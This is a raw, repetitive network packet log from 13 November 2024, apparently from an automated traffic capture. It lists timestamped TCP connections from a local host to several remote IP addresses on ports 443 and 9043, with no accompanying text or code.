                                                                                                                                          Nov 13, 2024 18:22:15.101139069 CET50015443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:15.101403952 CET50015443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:15.101413965 CET44350015104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:15.111269951 CET50016443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:15.111309052 CET44350016104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:15.111382008 CET50016443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:15.111556053 CET50016443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:15.111565113 CET44350016104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:15.981848001 CET44350016104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:15.982039928 CET50016443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:15.983400106 CET50016443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:15.983400106 CET50016443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:15.983408928 CET44350016104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:15.983421087 CET44350016104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:16.693943024 CET44350016104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:16.694030046 CET44350016104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:16.694102049 CET50016443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:16.694516897 CET50016443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:16.694531918 CET44350016104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:16.712104082 CET50017443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:16.712141991 CET44350017104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:16.712518930 CET50017443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:16.712701082 CET50017443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:16.712713957 CET44350017104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:17.325167894 CET44350017104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:17.325529099 CET50017443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:17.326409101 CET50017443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:17.326425076 CET44350017104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:17.330960035 CET50017443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:17.330966949 CET44350017104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:17.753226042 CET44350017104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:17.753300905 CET44350017104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:17.753343105 CET50017443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:17.753343105 CET50017443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:17.753678083 CET50017443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:17.753691912 CET44350017104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:17.766799927 CET50018443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:17.766843081 CET44350018104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:17.766907930 CET50018443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:17.767095089 CET50018443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:17.767102957 CET44350018104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:18.397838116 CET44350018104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:18.397919893 CET50018443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:18.398279905 CET50018443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:18.398286104 CET44350018104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:18.399409056 CET50018443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:18.399414062 CET44350018104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:18.782831907 CET44350018104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:18.782891035 CET50018443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:18.782906055 CET44350018104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:18.782948017 CET50018443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:18.782958031 CET44350018104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:18.783056974 CET50018443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:18.783272028 CET50018443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:18.783287048 CET44350018104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:18.789077997 CET50019443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:18.789130926 CET44350019104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:18.789199114 CET50019443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:18.789433956 CET50019443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:18.789447069 CET44350019104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:19.737555981 CET44350019104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:19.737665892 CET50019443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:19.738003016 CET50019443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:19.738008022 CET44350019104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:19.738989115 CET50019443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:19.738993883 CET44350019104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:20.511687994 CET44350019104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:20.511785984 CET50019443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:20.511815071 CET44350019104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:20.511892080 CET50019443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:20.511902094 CET44350019104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:20.511950970 CET50019443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:20.512108088 CET50019443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:20.512124062 CET44350019104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:20.532740116 CET50020443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:20.532767057 CET44350020104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:20.532869101 CET50020443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:20.533058882 CET50020443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:20.533071995 CET44350020104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:21.408925056 CET44350020104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:21.409127951 CET50020443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:21.409501076 CET50020443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:21.409504890 CET44350020104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:21.410765886 CET50020443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:21.410770893 CET44350020104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:22.159336090 CET44350020104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:22.159405947 CET44350020104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:22.159405947 CET50020443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:22.159471035 CET50020443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:22.159738064 CET50020443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:22.159751892 CET44350020104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:22.164762020 CET50021443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:22.164807081 CET44350021104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:22.165163040 CET50021443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:22.165319920 CET50021443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:22.165334940 CET44350021104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:23.039530039 CET44350021104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:23.039589882 CET50021443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:23.040195942 CET50021443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:23.040208101 CET44350021104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:23.041510105 CET50021443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:23.041527033 CET44350021104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:23.919183016 CET44350021104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:23.919321060 CET50021443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:23.919334888 CET44350021104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:23.919451952 CET44350021104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:23.919507980 CET50021443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:23.919586897 CET50021443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:23.920006037 CET50021443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:23.920021057 CET44350021104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:23.938986063 CET50022443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:23.939028025 CET44350022104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:23.939130068 CET50022443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:23.939363003 CET50022443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:23.939372063 CET44350022104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:24.805555105 CET44350022104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:24.805613041 CET50022443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:24.806026936 CET50022443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:24.806034088 CET44350022104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:24.807379007 CET50022443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:24.807385921 CET44350022104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:25.548026085 CET44350022104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:25.548114061 CET50022443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:25.548130035 CET44350022104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:25.548144102 CET44350022104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:25.548187971 CET50022443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:25.548530102 CET50022443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:25.548546076 CET44350022104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:25.554478884 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:25.554527998 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:25.554595947 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:25.554816008 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:25.554837942 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.173180103 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.173413992 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:26.174173117 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:26.174180984 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.178221941 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:26.178230047 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.606791019 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.606874943 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:26.606903076 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.606961012 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:26.606983900 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.607086897 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:26.607095003 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.607150078 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:26.607155085 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.607320070 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:26.607361078 CET50023443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:26.607377052 CET44350023104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.632679939 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:26.632726908 CET44350024104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:26.632790089 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:26.633074999 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:26.633089066 CET44350024104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:27.540879965 CET44350024104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:27.540954113 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:27.542052031 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:27.542063951 CET44350024104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:27.542916059 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:27.542924881 CET44350024104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.072766066 CET44350024104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.072890043 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:28.072905064 CET44350024104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.073009968 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:28.073906898 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:28.073955059 CET44350024104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.074122906 CET44350024104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.074285984 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:28.074285984 CET50024443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:28.078411102 CET50025443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:28.078452110 CET44350025104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.078643084 CET50025443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:28.078845024 CET50025443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:28.078855038 CET44350025104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.687246084 CET44350025104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.687333107 CET50025443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:28.687962055 CET50025443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:28.687968969 CET44350025104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.688972950 CET50025443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:28.688977957 CET44350025104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.991178989 CET44350025104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.991247892 CET50025443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:28.991262913 CET44350025104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.991307020 CET50025443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:28.991326094 CET44350025104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:28.991369963 CET50025443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:28.992014885 CET50025443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:28.992029905 CET44350025104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:29.005898952 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:29.005938053 CET44350026104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:29.006143093 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:29.006364107 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:29.006381989 CET44350026104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:29.900275946 CET44350026104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:29.900602102 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:29.904067993 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:29.904079914 CET44350026104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:29.904346943 CET44350026104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:29.904483080 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:29.905036926 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:29.947325945 CET44350026104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:30.516241074 CET44350026104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:30.516349077 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:30.516386986 CET44350026104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:30.516522884 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:30.516535997 CET44350026104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:30.516649961 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:30.516956091 CET50026443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:30.516987085 CET44350026104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:30.521950960 CET50027443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:30.522027969 CET44350027104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:30.522160053 CET50027443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:30.522279978 CET50027443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:30.522308111 CET44350027104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:31.429574966 CET44350027104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:31.429651022 CET50027443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:31.430171013 CET50027443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:31.430177927 CET44350027104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:31.431536913 CET50027443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:31.431545973 CET44350027104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:32.213699102 CET44350027104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:32.213819981 CET44350027104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:32.213906050 CET50027443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:32.214178085 CET50027443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:32.214190006 CET44350027104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:32.220221043 CET50028443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:32.220272064 CET44350028104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:32.220524073 CET50028443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:32.220658064 CET50028443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:32.220668077 CET44350028104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:33.096364021 CET44350028104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:33.096565008 CET50028443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:33.096863985 CET50028443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:33.096875906 CET44350028104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:33.098644972 CET50028443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:33.098649025 CET44350028104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:33.591828108 CET44350028104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:33.592051983 CET44350028104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:33.592109919 CET50028443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:33.594532013 CET50028443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:33.594548941 CET44350028104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:33.623991013 CET50030443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:33.624044895 CET44350030104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:33.624169111 CET50030443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:33.624456882 CET50030443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:33.624473095 CET44350030104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:34.186034918 CET500319043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:34.217191935 CET90435003145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:34.217291117 CET500319043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:34.217955112 CET500319043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:34.222768068 CET90435003145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:34.499955893 CET44350030104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:34.500030041 CET50030443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:34.500380039 CET50030443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:34.500391960 CET44350030104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:34.501517057 CET50030443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:34.501523972 CET44350030104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.036689997 CET44350030104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.036761999 CET50030443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:35.036794901 CET44350030104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.036811113 CET44350030104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.036848068 CET50030443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:35.037055016 CET50030443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:35.037070990 CET44350030104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.048564911 CET50032443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:35.048600912 CET44350032104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.048701048 CET50032443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:35.048904896 CET50032443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:35.048917055 CET44350032104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.049762011 CET90435003145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.049827099 CET500319043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:35.049976110 CET90435003145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.049985886 CET90435003145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.050021887 CET500319043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:35.050039053 CET500319043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:35.050476074 CET90435003145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.050517082 CET500319043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:35.052728891 CET500319043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:35.061479092 CET90435003145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.298417091 CET90435003145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.298490047 CET500319043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:35.299046993 CET500319043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:22:35.303873062 CET90435003145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.568980932 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.569055080 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:22:35.673002005 CET44350032104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.673100948 CET50032443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:35.673914909 CET50032443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:35.673943996 CET44350032104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.677917004 CET50032443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:35.677931070 CET44350032104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.939100981 CET44350032104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.939385891 CET44350032104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:35.941931963 CET50032443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:35.961921930 CET50032443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:22:35.961970091 CET44350032104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:36.254595995 CET50033443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:36.254709959 CET44350033104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:36.254795074 CET50033443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:36.255219936 CET50033443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:36.255255938 CET44350033104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:37.181051016 CET44350033104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:22:37.181142092 CET50033443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:22:37.181679010 CET50033443192.168.2.6104.21.15.162
